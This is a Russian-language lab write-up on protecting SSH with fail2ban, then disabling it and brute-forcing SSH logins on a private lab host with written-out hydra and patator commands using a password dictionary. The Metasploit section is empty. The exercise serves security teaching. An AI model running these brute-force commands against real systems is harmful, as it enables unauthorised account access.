# **Практическая работа “Fail2Ban-SSH и Brute-force attack”**
Обновим список пакетов в системе:
`sudo apt update`

Установим и запустим fail2ban:
`sudo apt install fail2ban`

`service fail2ban start`

Изменим conf-файл:
`sudo nano jail.conf` - находясь в директории etc/fail2ban

Перезапустим демон:
`service fail2ban restart`

И попробуем подключение по ssh с невалидным паролем:


Результат действий fail2ban и последующая мануальная разблокировка адреса:

`fail2ban-client unban 192.168.100.12`
`service fail2ban restart` - для перезапуска демона после разблокировки адреса
`sudo fail2ban-client status sshd` - проверяем результат

Выключаем fail2ban:
`cd etc/fail2ban`
`sudo nano jail.conf`
`enable=false` - меняем на фолсу
Перейдём к проверке с помощью hydra:
`hydra -l user -P ./test_dict.txt ssh://192.168.100.9 -I -v -V` - Hydra брутит пользователя user по словарю паролей из файла по ssh с подробным выводом событий, парами логин/пароль (использовавшимися при подборе)

Результат:

Используем иные средства bruteforce
patator:
`ssh_login host=192.168.100.9 user=user password=FILE0 0=test_dict.txt -x ignore:mesg='Authentication failed` - patator проводит попытки входа под логином user по адресу, подбирая пароль из файла, не выводя "Аутентификация не удалась"

Bruteforce через Metasploit:


